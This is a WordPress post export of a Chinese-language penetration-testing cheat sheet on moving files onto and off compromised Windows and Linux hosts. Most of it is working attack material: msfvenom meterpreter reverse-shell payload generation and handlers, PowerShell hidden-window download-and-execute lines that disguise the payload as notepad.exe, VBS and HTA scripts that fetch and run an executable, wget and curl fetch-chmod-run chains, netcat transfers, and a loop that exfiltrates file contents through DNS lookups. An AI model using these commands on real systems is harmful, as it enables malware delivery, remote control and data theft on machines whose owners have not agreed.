{"id":1888,"date":"2025-02-22T10:50:18","date_gmt":"2025-02-22T02:50:18","guid":{"rendered":"http:\/\/gzxingyu.cloud\/?p=1888"},"modified":"2025-02-22T10:50:19","modified_gmt":"2025-02-22T02:50:19","slug":"01-%e6%96%87%e4%bb%b6%e4%bc%a0%e8%be%93%e6%96%b9%e6%b3%95","status":"publish","type":"post","link":"http:\/\/gzxingyu.cloud\/index.php\/2025\/02\/22\/01-%e6%96%87%e4%bb%b6%e4%bc%a0%e8%be%93%e6%96%b9%e6%b3%95\/","title":{"rendered":"01.\u6587\u4ef6\u4f20\u8f93\u65b9\u6cd5"},"content":{"rendered":"

\u4e00\u3001Windows\u4e0b\u6587\u4ef6\u4f20\u8f93<\/h1>\n

1.Bitsadmin<\/h2>\n

BITSAdmin \u662f\u4e00\u4e2a\u547d\u4ee4\u884c\u5de5\u5177\uff0c\u53ef\u4ee5\u4f7f\u7528\u5b83\u521b\u5efa\u4e0b\u8f7d\u6216\u4e0a\u4f20\u4f5c\u4e1a\uff0c\u5e76\u76d1\u89c6\u5176\u8fdb\u5ea6\u3002<\/p>\n

1\uff09msfvenom \u751f\u6210 Payload<\/h3>\n
msfvenom -p windows\/x64\/meterpreter\/reverse_tcp lhost=10.34.126.129 lport=6666 -f hta-psh > 6666.hta\n<\/code><\/pre>\n
2\uff09\u542f\u52a8 Apache2 \u670d\u52a1\uff0c\u6258\u7ba1 Payload<\/h3>\n
# \u542f\u52a8apache2\u670d\u52a1\nservice apache2 start\n\n# \u590d\u5236payload\u5230web\u6839\u76ee\u5f55\ncp 6666.hta \/var\/www\/html\/\n<\/code><\/pre>\n
\"Pasted<\/p>\n
3\uff09bitsadmin \u4e0b\u8f7d Payload<\/h3>\n
bitsadmin \/transfer shell http:\/\/10.34.126.129\/6666.hta C:\\windows\\temp\\6666.hta\n<\/code><\/pre>\n
\"Pasted<\/p>\n
    \n
  • \/transfer\uff1a\u7528\u4e8e\u521b\u5efa\u4e00\u4e2a\u65b0\u7684\u4f20\u8f93\u4f5c\u4e1a<\/li>\n
  • shell\uff1a\u4f20\u8f93\u4f5c\u4e1a\u540d\u79f0<\/li>\n
  • http:\/\/10.34.126.129\/6666.hta<\/code>\uff1a\u8981\u4e0b\u8f7d\u7684\u6587\u4ef6\u7684 URL \u5730\u5740<\/li>\n
  • C:\\windows\\temp\\6666.hta\uff1a\u6587\u4ef6\u4e0b\u8f7d\u540e\u5b58\u50a8\u7684\u672c\u5730\u8def\u5f84\u548c\u6587\u4ef6\u540d\u3002\u6587\u4ef6\u5c06\u4fdd\u5b58\u5728 Windows \u7cfb \u7edf\u7684\u4e34\u65f6\u6587\u4ef6\u5939\u4e2d\u3002<\/li>\n<\/ul>\n
    4\uff09\u542f\u52a8 metasploit \u76d1\u542c\u5668<\/h3>\n
    handler -p windows\/x64\/meterpreter\/reverse_tcp -H 10.34.126.129 -P 6666\n<\/code><\/pre>\n
    \"Pasted<\/p>\n
    5\uff09\u6267\u884c Payload<\/h3>\n
    rundll32.exe url.dll,OpenURL C:\\windows\\temp\\6666.hta\n<\/code><\/pre>\n
    \"Pasted<\/p>\n
      \n
    • rundll32.exe<\/code>\uff1aWindows \u4e2d\u7684\u4e00\u4e2a\u5de5\u5177\uff0c\u7528\u4e8e\u6267\u884c DLL\uff08\u52a8\u6001\u94fe\u63a5\u5e93\uff09\u4e2d\u5bfc\u51fa\u7684\u51fd\u6570\u3002<\/li>\n
    • url.dll,OpenURL<\/code>\uff1a\u8fd9\u662f\u8c03\u7528\u00a0url.dll<\/code>\u00a0\u4e2d\u7684\u00a0OpenURL<\/code>\u00a0\u51fd\u6570\uff0c\u7528\u4e8e\u6253\u5f00\u6307\u5b9a\u7684\u6587\u4ef6\u6216 URL\u3002<\/li>\n
    • C:\\windows\\temp\\6666.hta<\/code>\uff1a\u8fd9\u662f\u4f60\u8981\u6267\u884c\u7684 HTA \u6587\u4ef6\u7684\u8def\u5f84\u3002<\/li>\n<\/ul>\n
      2.Certutil<\/h2>\n
      \u8fc7\u7a0b\u53ef\u53c2\u8003\u4ee5\u4e0b\u7684\u6587\u7ae0
      \n[[06.Windows \u53cd\u5f39 shell \u65b9\u6cd5#\u4e03\u3001Certutil]]<\/p>\n
      3.Powershell<\/h2>\n
      1\uff09DownloadFile<\/h3>\n
      # \u521b\u5efa\u4e00\u4e2a&nbsp;System.Net.WebClient \u5bf9\u8c61\uff0c\u5e76\u5c06\u5176\u5b58\u50a8\u5728\u53d8\u91cf&nbsp;$d&nbsp;\u4e2d\n$d = New-Object System.Net.WebClient\n\n# \u8c03\u7528\u5bf9\u8c61\u7684DownloadFile\u65b9\u6cd5\u4e0b\u8f7d\u6587\u4ef6\n$d.DownloadFile("https:\/\/pastebin.com\/raw\/M676F14U","s.txt")\n<\/code><\/pre>\n
      # \u4f7f\u7528 powershell -c \u6765\u6267\u884c\u4e00\u4e2a\u5b57\u7b26\u4e32\u5f62\u5f0f\u7684\u547d\u4ee4\npowershell -c "$p=new-object system.net.webclient;$p.DownloadFile('https:\/\/pastebin.com\/raw\/M676F14U','s.txt')"\n\npowershell -command "(new-object system.net.webclient).downloadfile('https:\/\/pastebin.com\/raw\/M676F14U','s.txt')"\n<\/code><\/pre>\n
      # \u4f7f\u7528 powershell \u547d\u4ee4\u76f4\u63a5\u6267\u884c\npowershell (new-object system.net.webclient).downloadfile('https:\/\/pastebin.com\/raw\/M676F14U','s.txt')\n<\/code><\/pre>\n
        \n
      • \u8fdc\u7a0b\u4e0b\u8f7d\u6587\u4ef6\u5230\u672c\u5730\u5e76\u6267\u884c<\/li>\n<\/ul>\n
        cmd \/c powershell -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http:\/\/10.34.126.129\/6666.exe','notepad.exe');start-process .\\notepad.exe\n<\/code><\/pre>\n
        2.Invoke-WebRequest<\/h2>\n
        Invoke-WebRequest\uff1a\u662f PowerShell \u7684\u4e00\u4e2a cmdlet\uff0c\u7528\u4e8e\u53d1\u9001 HTTP \u6216 HTTPS \u8bf7\u6c42\u5230\u6307\u5b9a\u7684 URI\u3002
        \n\u522b\u540d\uff1aiwr\u3001wget\u3001curl<\/p>\n
        powershell Invoke-WebRequest -uri "https:\/\/pastebin.com\/raw\/M676F14U" -OutFile "$env:temp\\s.txt"\n<\/code><\/pre>\n
        3.DownloadString<\/h2>\n
        [[06.Windows \u53cd\u5f39 shell \u65b9\u6cd5#2.PowerShell \u52a0\u8f7d Powercat]]<\/p>\n
        4.SCP<\/h2>\n
        SCP\u5728windows\u7cfb\u7edf\u4e0b\u53ef\u8fdb\u884c\u672c\u5730\u4e0e\u8fdc\u7a0b\u4e3b\u673a\u3001\u4e0d\u540c\u8fdc\u7a0b\u4e3b\u673a\u95f4\u7684\u6587\u4ef6\u590d\u5236\uff0c\u8fd8\u652f\u6301\u6574\u4e2a\u76ee\u5f55\u7ed3\u6784\u7684\u9012\u5f52\u4f20\u8f93\u3002
        \nwindows10\u53ca\u4ee5\u4e0a\u7cfb\u7edf\u81ea\u5e26\u3002<\/p>\n
          \n
        • SCP \u4e0b\u8f7d\u6587\u4ef6<\/li>\n<\/ul>\n
          # \u4e0b\u8f7d\u5355\u4e2a\u6587\u4ef6\nscp root@192.168.81.229:\/root\/6666.hta 6666.hta\n\n# \u4e0b\u8f7d\u6587\u4ef6\u5939\u4e0b\u6240\u6709\u6587\u4ef6\nscp -r root@192.168.81.229:\/var\/www\/html html\/\n<\/code><\/pre>\n
            \n
          • SCP \u4e0a\u4f20\u6587\u4ef6
            \n\u4e0a\u4f20\u5355\u4e2a\u6587\u4ef6<\/li>\n<\/ul>\n
            scp test.txt root@192.168.81.229:\/tmp\/test.txt\n<\/code><\/pre>\n
            \u4e0a\u4f20\u6587\u4ef6\u5939<\/p>\n
            scp -r password\/ root@192.168.81.229:\/tmp\/pass\/\n<\/code><\/pre>\n
            5.net use<\/h2>\n
            net use \u547d\u4ee4\u662f Windows \u64cd\u4f5c\u7cfb\u7edf\u4e2d\u7684\u4e00\u4e2a\u547d\u4ee4\uff0c\u7528\u4e8e\u5c06\u5171\u4eab\u8d44\u6e90\u6620\u5c04\u5230\u672c\u5730\u8ba1\u7b97\u673a\u4e0a\u3002<\/p>\n
              \n
            • \u663e\u793a\u5efa\u7acb\u7684\u7f51\u7edc\u5171\u4eab\u8fde\u63a5<\/li>\n<\/ul>\n
              net use\n<\/code><\/pre>\n
                \n
              • \u4e0e\u8fdc\u7a0b\u4e3b\u673a192.168.81.227\u7684C\u76d8\u5efa\u7acb\u7f51\u7edc\u5171\u4eab\u8fde\u63a5\uff0c\u5e76\u6620\u5c04\u8fdc\u7a0b\u4e3b\u673aC\u76d8\uff0c\u5230\u672c\u5730K\u76d8<\/li>\n<\/ul>\n
                net use k: \\\\192.168.81.227\\c$ \/user:\u7528\u6237\u540d "\u5bc6\u7801"\n<\/code><\/pre>\n
                \u5bc6\u7801\u7684\u5f15\u53f7\u53ef\u4ee5\u4e0d\u7528<\/p>\n
                  \n
                • \u5217\u51fa\u672c\u5730K\u76d8\u76ee\u5f55\uff0c\u4e5f\u5c31\u662f\u663e\u793a\u7684\u8fdc\u7a0b\u4e3b\u673a192.168.81.227\u7684C\u76d8<\/li>\n<\/ul>\n
                  dir K:\n<\/code><\/pre>\n
                    \n
                  • \u663e\u793a\u8fdc\u7a0b\u4e3b\u673a192.168.81.227\u7684C\u76d8\u76ee\u5f55\u6587\u4ef6<\/li>\n<\/ul>\n
                    dir \\\\192.168.81.227\\c$\n<\/code><\/pre>\n
                      \n
                    • \u590d\u5236\u8fdc\u7a0b\u4e3b\u673a192.168.81.227\u7684C\u76d8\u76ee\u5f55\u4e0b\u76846666.hta\u6587\u4ef6\u5230\u672c\u5730<\/li>\n<\/ul>\n
                      copy \\\\192.168.81.227\\c$\\6666.hta c:\\6666.hta\n<\/code><\/pre>\n
                        \n
                      • \u4e0a\u4f20\u672c\u5730\u6587\u4ef6\u5230\u8fdc\u7a0b\u4e3b\u673a<\/li>\n<\/ul>\n
                        copy a.txt \\\\192.168.81.227\\c$\n<\/code><\/pre>\n
                          \n
                        • \u67e5\u770b\u6587\u4ef6\u5185\u5bb9<\/li>\n<\/ul>\n
                          type \\\\192.168.81.227\\c$\\a.txt\n<\/code><\/pre>\n
                            \n
                          • \u65ad\u5f00\u7f51\u7edc\u8fde\u63a5<\/li>\n<\/ul>\n
                            net use \\\\192.168.81.227\\c$ \/del\n<\/code><\/pre>\n
                            net use K: \/del\n<\/code><\/pre>\n
                            6.VBS<\/h2>\n
                            \u4fdd\u5b58\u4e3a .vbs \u6587\u4ef6\u540e\u8fd0\u884c<\/p>\n
                            1\uff09\u4e0b\u8f7d<\/h3>\n
                            download.vbs<\/p>\n
                            ' \u4f7f\u7528CreateObject()\u65b9\u6cd5\u521b\u5efa\u4e00\u4e2a\u540d\u4e3axPost\u7684XMLHttpRequest\u5bf9\u8c61\uff0c\u7528\u4e8e\u5411\u8fdc\u7a0b\u670d\u52a1\u5668\u53d1\u9001HTTP\u8bf7\u6c42\nSet xPost=createObject("Microsoft.XMLHTTP")\n' \u8c03\u7528Open()\u65b9\u6cd5\u6253\u5f00\u4e00\u4e2aGET\u8bf7\u6c42\uff0c\u6307\u5b9a\u8981\u4e0b\u8f7d\u7684\u6587\u4ef6\u7684URL\u5730\u5740\n' \u6700\u540e\u4e00\u4e2a\u53c2\u6570\u4e3a0\u8868\u793a\u5f02\u6b65\u8bf7\u6c42\uff0c\u5373\u4e0d\u7b49\u5f85\u670d\u52a1\u5668\u54cd\u5e94\u76f4\u63a5\u6267\u884c\u4e0b\u4e00\u6761\u8bed\u53e5\nxPost.Open "GET","http:\/\/192.168.81.229\/6666.exe",0\n' \u8c03\u7528Send()\u65b9\u6cd5\u53d1\u9001\u8bf7\u6c42\u5e76\u83b7\u53d6\u54cd\u5e94\u5185\u5bb9\u3002\nxPost.Send()\n' \u4f7f\u7528CreateObject()\u521b\u5efa\u4e00\u4e2a\u540d\u4e3asGet\u7684ADODB.Stream\u5bf9\u8c61\uff0c\u7528\u4e8e\u5c06\u54cd\u5e94\u5185\u5bb9\u4fdd\u5b58\u5230\u672c\u5730\u6587\u4ef6\n' \u8bbe\u7f6esGet\u7684Mode\u4e3a3\uff08adModeReadWrite\uff09\uff0cType\u4e3a1\uff08adTypeBinary\uff09\uff0c\u8868\u793a\u4ee5\u4e8c\u8fdb\u5236\u65b9\u5f0f\u8bfb\u5199\u6d41\u6570\u636e\n' \u7136\u540e\u8c03\u7528Open()\u65b9\u6cd5\u6253\u5f00\u6d41\uff0c\u8c03\u7528Write()\u65b9\u6cd5\u5199\u5165\u54cd\u5e94\u5185\u5bb9\uff0c\u6700\u540e\u8c03\u7528SaveToFile()\u65b9\u6cd5\u5c06\u6d41\u6570\u636e\u4fdd\u5b58\u5230\u672c\u5730\u6587\u4ef6\u4e2d\nset sGet=createObject("ADODB.Stream")\nsGet.Mode=3\nsGet.Type=1\nsGet.Open()\nsGet.Write xPost.ResponseBody\nsGet.SaveToFile "c:\\6666.exe",2\n<\/code><\/pre>\n
                            cscript download.vbs\n<\/code><\/pre>\n
                            2\uff09\u4e0b\u8f7d\u5e76\u6267\u884c<\/h3>\n
                            download_run.vbs<\/p>\n
                            Set Post = CreateObject("Msxml2.XMLHTTP")\nSet Shell = CreateObject("Wscript.Shell")\nPost.Open "GET","http:\/\/192.168.81.229\/6666.exe",0\nPost.Send()\nSet aGet = CreateObject("ADODB.Stream")\naGet.Mode = 3\naGet.Type = 1\naGet.Open()\naGet.Write(Post.responseBody)\naGet.SaveToFile "c:\\6666.exe",2\nwscript.sleep 1000\nShell.Run ("c:\\6666.exe") '\u5ef6\u8fdf\u8fc7\u540e\u6267\u884c\u4e0b\u8f7d\u6587\u4ef6\n<\/code><\/pre>\n
                            3\uff09cmd \u547d\u4ee4\u5199\u5165\u811a\u672c\u5e76\u6267\u884c<\/h3>\n
                            echo Set Post = CreateObject("Msxml2.XMLHTTP") >>zl.vbs\necho Set Shell = CreateObject("Wscript.Shell") >>zl.vbs\necho Post.Open "GET","http:\/\/192.168.81.229\/6666.exe",0 >>zl.vbs\necho Post.Send() >>zl.vbs\necho Set aGet = CreateObject("ADODB.Stream") >>zl.vbs\necho aGet.Mode = 3 >>zl.vbs\necho aGet.Type = 1 >>zl.vbs\necho aGet.Open() >>zl.vbs\necho aGet.Write(Post.responseBody) >>zl.vbs\necho aGet.SaveToFile "c:\\6666.exe",2 >>zl.vbs\necho wscript.sleep 1000 >>zl.vbs\necho Shell.Run ("c:\\6666.exe") >>zl.vbs\ncscript zl.vbs\n<\/code><\/pre>\n
                            4\uff09wget.vbs<\/h3>\n
                            ' \u5f00\u542f\u9519\u8bef\u5904\u7406\uff0c\u5f53\u53d1\u751f\u9519\u8bef\u65f6\u8df3\u8fc7\u5e76\u7ee7\u7eed\u6267\u884c\u4e0b\u4e00\u6761\u8bed\u53e5\non error resume next\n' \u4f7f\u7528"Wscript.Arguments()"\u83b7\u53d6\u547d\u4ee4\u884c\u53c2\u6570\uff0c\u5206\u522b\u8d4b\u503c\u7ed9iLocal\u3001iRemote\u3001iUser\u548ciPass\u53d8\u91cf\u3002\n' iLocal\u8868\u793a\u672c\u5730\u4fdd\u5b58\u6587\u4ef6\u7684\u8def\u5f84\uff0c\n' iRemote\u8868\u793a\u8fdc\u7a0b\u6587\u4ef6\u7684URL\u5730\u5740\uff0c\n' iUser\u548ciPass\u8868\u793a\u8bbf\u95ee\u8fdc\u7a0b\u670d\u52a1\u5668\u9700\u8981\u7684\u7528\u6237\u540d\u548c\u5bc6\u7801\uff08\u5982\u679c\u4e0d\u9700\u8981\u8ba4\u8bc1\uff0c\u5219\u4e3a\u7a7a\u5b57\u7b26\u4e32\uff09\niLocal=LCase(Wscript.Arguments(1))\niRemote=LCase(Wscript.Arguments(0))\niUser=LCase(Wscript.Arguments(2))\niPass=LCase(Wscript.Arguments(3))\n' \u4f7f\u7528CreateObject()\u521b\u5efa\u4e00\u4e2a\u540d\u4e3axPost\u7684XMLHttpRequest\u5bf9\u8c61\uff0c\u7528\u4e8e\u5411\u8fdc\u7a0b\u670d\u52a1\u5668\u53d1\u9001HTTP\u8bf7\u6c42\nset xPost=CreateObject("Microsoft.XMLHTTP")\n' \u5224\u65ad\u662f\u5426\u9700\u8981\u8ba4\u8bc1\uff0c\u8c03\u7528Open()\u65b9\u6cd5\u6253\u5f00\u4e00\u4e2aGET\u8bf7\u6c42\uff0c\u6700\u540e\u8c03\u7528Send()\u65b9\u6cd5\u53d1\u9001\u8bf7\u6c42\u5e76\u83b7\u53d6\u54cd\u5e94\u5185\u5bb9\nif iUser="" and iPass="" then\nxPost.Open "GET",iRemote,0\nelse\nxPost.Open "GET",iRemote,0,iUser,iPass\nend if\nxPost.Send()\n' \u4f7f\u7528CreateObject()\u521b\u5efa\u4e00\u4e2a\u540d\u4e3asGet\u7684ADODB.Stream\u5bf9\u8c61\uff0c\u7528\u4e8e\u5c06\u54cd\u5e94\u5185\u5bb9\u4fdd\u5b58\u5230\u672c\u5730\u6587\u4ef6\n' \u8bbe\u7f6esGet\u7684Mode\u4e3a3\uff08adModeReadWrite\uff09\uff0cType\u4e3a1\uff08adTypeBinary\uff09\uff0c\u8868\u793a\u4ee5\u4e8c\u8fdb\u5236\u65b9\u5f0f\u8bfb\u5199\u6d41\u6570\u636e\n' \u7136\u540e\u8c03\u7528Open()\u65b9\u6cd5\u6253\u5f00\u6d41\uff0c\u8c03\u7528Write()\u65b9\u6cd5\u5199\u5165\u54cd\u5e94\u5185\u5bb9\uff0c\u6700\u540e\u8c03\u7528SaveToFile()\u65b9\u6cd5\u5c06\u6d41\u6570\u636e\u4fdd\u5b58\u5230\u672c\u5730\u6587\u4ef6iLocal\u4e2d\nset sGet=CreateObject("ADODB.Stream")\nsGet.Mode=3\nsGet.Type=1\nsGet.Open()\nsGet.Write xPost.ResponseBody\nsGet.SaveToFile iLocal,2\n<\/code><\/pre>\n
                            \u4f7f\u7528\u65b9\u6cd5<\/p>\n
                            cscript wget.vbs http:\/\/192.168.81.229\/6666.exe c:\\6666.exe\n<\/code><\/pre>\n
                            \u529f\u80fd\u7c7b\u4f3c\u4e8ewget<\/p>\n
                            7.HTA<\/h2>\n
                            \u4fdd\u5b58\u4e3a .hta \u6587\u4ef6\u540e\u8fd0\u884c<\/p>\n
                            <html>\n<head>\n<script>\n\/\/ \u4f7f\u7528new ActiveXObject()\u65b9\u6cd5\u521b\u5efa\u4e00\u4e2a\u540d\u4e3aObject\u7684MSXML2.XMLHTTP\u5bf9\u8c61\uff0c\u7528\u4e8e\u5411\u8fdc\u7a0b\u670d\u52a1\u5668\u53d1\u9001HTTP\u8bf7\u6c42\n\/\/ \u7136\u540e\u8c03\u7528Object.open()\u65b9\u6cd5\u6253\u5f00\u4e00\u4e2aGET\u8bf7\u6c42\uff0c\u6307\u5b9a\u8981\u4e0b\u8f7d\u7684\u6587\u4ef6\u7684URL\u5730\u5740\n\/\/ \u6700\u540e\u4e00\u4e2a\u53c2\u6570\u4e3afalse\u8868\u793a\u540c\u6b65\u8bf7\u6c42\uff0c\u5373\u7b49\u5f85\u670d\u52a1\u5668\u54cd\u5e94\u540e\u518d\u6267\u884c\u4e0b\u4e00\u6761\u8bed\u53e5\n\/\/ \u4f7f\u7528Object.send()\u65b9\u6cd5\u53d1\u9001\u8bf7\u6c42\u5e76\u83b7\u53d6\u54cd\u5e94\u5185\u5bb9\nvar Object = new ActiveXObject("MSXML2.XMLHTTP");\nObject.open("GET","http:\/\/192.168.81.229\/6666.exe",false);\nObject.send();\n\n\/\/ \u68c0\u67e5Object.Status\u7684\u503c\u662f\u5426\u7b49\u4e8e200\uff0c\u8868\u793aHTTP\u54cd\u5e94\u7684\u72b6\u6001\u7801\u662f\u5426\u4e3a\u6210\u529f\u3002\n\/\/ \u54cd\u5e94\u6210\u529f\uff0c\u5c31\u4f7f\u7528new ActiveXObject()\u65b9\u6cd5\u521b\u5efa\u4e00\u4e2a\u540d\u4e3aStream\u7684ADODB.Stream\u5bf9\u8c61\uff0c\u7528\u4e8e\u5c06\u54cd\u5e94\u5185\u5bb9\u4fdd\u5b58\u5230\u672c\u5730\u6587\u4ef6\n\/\/ \u7136\u540e\u8c03\u7528Stream.Open()\u65b9\u6cd5\u6253\u5f00\u6d41\uff0c\u8c03\u7528Stream.Type = 1\u65b9\u6cd5\u8bbe\u7f6e\u6d41\u6570\u636e\u7c7b\u578b\u4e3a\u4e8c\u8fdb\u5236\n\/\/ \u8c03\u7528Stream.Write()\u65b9\u6cd5\u5199\u5165\u54cd\u5e94\u5185\u5bb9\uff0c\u6700\u540e\u8c03\u7528Stream.SaveToFile()\u65b9\u6cd5\u5c06\u6d41\u6570\u636e\u4fdd\u5b58\u5230\u672c\u5730\u6587\u4ef6"C:\\6666.exe"\u4e2d\n\/\/ \u4f7f\u7528new ActiveXObject()\u65b9\u6cd5\u521b\u5efa\u4e00\u4e2a\u540d\u4e3aShell\u7684Wscript.Shell\u5bf9\u8c61\uff0c\u7528\u4e8e\u8fd0\u884c\u672c\u5730\u53ef\u6267\u884c\u6587\u4ef6\n\/\/ \u8c03\u7528Shell.Run()\u65b9\u6cd5\u8fd0\u884cC:\\6666.exe\u6587\u4ef6\n\/\/ \u8c03\u7528Stream.Close()\u65b9\u6cd5\u5173\u95ed\u6d41\uff0c\u8c03\u7528window.close()\u65b9\u6cd5\u5173\u95ed\u7a97\u53e3\nif (Object.Status == 200)\n{\n    var Stream = new ActiveXObject("ADODB.Stream");\n    Stream.Open();\n    Stream.Type = 1;\n    Stream.Write(Object.ResponseBody);\n    Stream.SaveToFile("C:\\\\6666.exe", 2);\n    Stream.Close();\n    var Shell = new ActiveXObject("Wscript.Shell");\n    Shell.Run("C:\\\\6666.exe");\n}\nwindow.close();\n<\/script>\n<HTA:APPLICATION ID="test" WINDOWSTATE = "minimize">\n<\/head>\n<body>\n<\/body>\n<\/html>\n<\/code><\/pre>\n
                            \u4e8c\u3001Linux\u4e0b\u6587\u4ef6\u4f20\u8f93<\/h1>\n
                            Msfvenom \u751f\u6210 Linux \u6267\u884c\u7684 payload<\/p>\n
                            msfvenom -p linux\/x64\/meterpreter\/reverse_tcp lhost=120.79.150.243 lport=6677 -f elf -o 6677.elf\n<\/code><\/pre>\n
                            \u521b\u5efa handler \u76d1\u542c\u5668<\/p>\n
                            handler -p linux\/x64\/meterpreter\/reverse_tcp -H 120.79.150.243 -P 6677\n<\/code><\/pre>\n
                            1.wget<\/h2>\n
                            wget http:\/\/120.79.150.243:8000\/6677.elf -P \/tmp\/ && chmod +x \/tmp\/6677.elf && \/tmp\/6677.elf &\n<\/code><\/pre>\n
                              \n
                            • -P\uff1a \u6307\u5b9a\u4e0b\u8f7d\u6587\u4ef6\u7684\u5b58\u50a8\u8def\u5f84<\/li>\n
                            • &\uff1a\u8868\u793a\u5728\u540e\u53f0\u8fd0\u884c
                              \n\"Pasted<\/li>\n<\/ul>\n
                              wget -O 5555.elf http:\/\/192.168.81.229\/5555.elf && chmod +x 5555.elf && .\/5555.elf &\n<\/code><\/pre>\n
                              -O\uff1a\u6307\u5b9a\u4e0b\u8f7d\u6587\u4ef6\u7684\u8f93\u51fa\u6587\u4ef6\u540d<\/p>\n
                              2.curl<\/h2>\n
                              curl -o 5555.elf http:\/\/192.168.81.229\/5555.elf && chmod +x 5555.elf && .\/5555.elf &\n\ncurl -O http:\/\/192.168.81.229\/5555.elf && chmod +x 5555.elf && .\/5555.elf &\n<\/code><\/pre>\n
                                \n
                              • -o\uff1a\u5c06\u4e0b\u8f7d\u7684\u6587\u4ef6\u4fdd\u5b58\u4e3a\u6307\u5b9a\u7684\u6587\u4ef6\u540d<\/li>\n
                              • -O\uff1a\u4f7f\u7528\u8fdc\u7a0b\u6587\u4ef6\u7684\u539f\u59cb\u6587\u4ef6\u540d\u4fdd\u5b58\u4e0b\u8f7d\u7684\u6587\u4ef6<\/li>\n<\/ul>\n
                                3.Netcat<\/h2>\n
                                  \n
                                • \u9776\u673a\u4e3b\u52a8\u8fde\u63a5\u653b\u51fb\u673a<\/li>\n<\/ul>\n
                                  # kali\ncat file | nc -lvvp 1234\n\n# linux\nnc 192.168.81.229 1234 > 5555.elf\n<\/code><\/pre>\n
                                  \"Pasted<\/p>\n
                                  \"Pasted<\/p>\n
                                  \"Pasted<\/p>\n
                                    \n
                                  • \u653b\u51fb\u673a\u4e3b\u52a8\u8fde\u63a5\u9776\u673a<\/li>\n<\/ul>\n
                                    # kali\nnc 192.168.81.221 1234 < 5555.elf\n\n# linux\nnc -lvvp 1234 > 5555.elf\n<\/code><\/pre>\n
                                    4.SFTP<\/h2>\n
                                    sftp root@10.34.126.129:\/var\/www\/html\/\n<\/code><\/pre>\n
                                    \"Pasted<\/p>\n
                                    sftp -P 22 root@192.168.81.229\n\nsftp -P 22 -i ~\/.ssh\/id_rsa root@192.168.81.229\n<\/code><\/pre>\n
                                      \n
                                    • -P\uff1a\u6307\u5b9a ssh \u7aef\u53e3<\/li>\n
                                    • -i\uff1a\u6307\u5b9a\u79c1\u94a5<\/li>\n<\/ul>\n
                                      5.DNS<\/h2>\n
                                      \u5229\u7528 dns \u4f20\u8f93\u6570\u636e<\/p>\n
                                      cat test | xxd -p -c 16 | while read line; do host $line.sau547.dnslog.cn; done\n<\/code><\/pre>\n
                                        \n
                                      1. cat test<\/code><\/strong>:
                                        \n\u8bfb\u53d6\u6587\u4ef6\u00a0test<\/code>\u00a0\u7684\u5185\u5bb9\u5e76\u8f93\u51fa\u5230\u6807\u51c6\u8f93\u51fa\u3002<\/li>\n
                                      2. xxd -p -c 16<\/code><\/strong>:<\/li>\n<\/ol>\n
                                          \n
                                        • xxd<\/code>\u00a0\u662f\u4e00\u4e2a\u5c06\u6587\u4ef6\u5185\u5bb9\u8f6c\u6362\u4e3a\u5341\u516d\u8fdb\u5236\u8868\u793a\u7684\u5de5\u5177\u3002<\/li>\n
                                        • -p<\/code>\u00a0\u9009\u9879\u8868\u793a\u4ee5\u7eaf\u5341\u516d\u8fdb\u5236\u683c\u5f0f\u8f93\u51fa\uff08\u4e0d\u5e26\u5730\u5740\u548c\u6587\u672c\u90e8\u5206\uff09\u3002<\/li>\n
                                        • -c 16<\/code>\u00a0\u8868\u793a\u6bcf\u884c\u8f93\u51fa 16 \u4e2a\u5b57\u8282\u7684\u5341\u516d\u8fdb\u5236\u6570\u636e\u3002<\/li>\n<\/ul>\n
                                            \n
                                          1. while read line; do host $line.sau547.dnslog.cn; done<\/code><\/strong>:<\/li>\n<\/ol>\n
                                              \n
                                            • \u9010\u884c\u8bfb\u53d6\u00a0xxd<\/code>\u00a0\u8f93\u51fa\u7684\u5341\u516d\u8fdb\u5236\u6570\u636e\u3002<\/li>\n
                                            • \u5bf9\u6bcf\u4e00\u884c\u6570\u636e\uff0c\u6267\u884c\u00a0host<\/code>\u00a0\u547d\u4ee4\uff0c\u5c06\u5341\u516d\u8fdb\u5236\u6570\u636e\u4f5c\u4e3a\u5b50\u57df\u540d\u7684\u4e00\u90e8\u5206\uff0c\u67e5\u8be2 DNS \u8bb0\u5f55\u3002<\/li>\n
                                            • \u4f8b\u5982\uff0c\u5982\u679c\u67d0\u884c\u6570\u636e\u662f\u00a0616263<\/code>\uff0c\u5219\u4f1a\u67e5\u8be2\u00a0616263.sau547.dnslog.cn<\/code>\u00a0\u7684 DNS \u8bb0\u5f55\u3002<\/li>\n<\/ul>\n
                                              \"Pasted<\/p>\n
                                              \"Pasted<\/p>\n
                                              \"Pasted<\/p>\n
                                              \u4e09\u3001\u811a\u672c\u8bed\u8a00\u4e0b\u6587\u4ef6\u4f20\u8f93<\/h1>\n
                                              1.PHP<\/h2>\n
                                              php -r 'file_put_contents("5555.elf",file_get_contents("http:\/\/192.168.81.229\/6677.elf"));'\n<\/code><\/pre>\n
                                                \n
                                              • file_put_contents: \u5c06\u4e00\u4e2a\u5b57\u7b26\u4e32\u5199\u5165\u6587\u4ef6<\/li>\n
                                              • file_get_contents: \u5c06\u6574\u4e2a\u6587\u4ef6\u8bfb\u5165\u4e00\u4e2a\u5b57\u7b26\u4e32<\/li>\n<\/ul>\n
                                                  \n
                                                1. php -r<\/code><\/strong>:
                                                  \n\u4f7f\u7528 PHP \u6267\u884c\u540e\u9762\u5f15\u53f7\u4e2d\u7684\u5355\u884c\u4ee3\u7801\u3002<\/li>\n
                                                2. file_get_contents("http:\/\/192.168.81.229\/6677.elf")<\/code><\/strong>:<\/li>\n<\/ol>\n
                                                    \n
                                                  • \u4ece\u6307\u5b9a\u7684 URL\uff08http:\/\/192.168.81.229\/6677.elf<\/code>\uff09\u83b7\u53d6\u6587\u4ef6\u5185\u5bb9\u3002<\/li>\n
                                                  • \u8fd4\u56de\u6587\u4ef6\u5185\u5bb9\u7684\u5b57\u7b26\u4e32\uff08\u5982\u679c\u662f\u4e8c\u8fdb\u5236\u6587\u4ef6\uff0c\u5219\u8fd4\u56de\u4e8c\u8fdb\u5236\u6570\u636e\uff09\u3002<\/li>\n<\/ul>\n
                                                      \n
                                                    1. file_put_contents("6677.elf", ...)<\/code><\/strong>:<\/li>\n<\/ol>\n
                                                        \n
                                                      • \u5c06\u83b7\u53d6\u5230\u7684\u6587\u4ef6\u5185\u5bb9\u5199\u5165\u672c\u5730\u6587\u4ef6\u00a06677.elf`\u3002<\/li>\n
                                                      • \u5982\u679c\u6587\u4ef6\u4e0d\u5b58\u5728\uff0c\u5219\u4f1a\u521b\u5efa\uff1b\u5982\u679c\u6587\u4ef6\u5df2\u5b58\u5728\uff0c\u5219\u4f1a\u8986\u76d6\u3002<\/li>\n<\/ul>\n
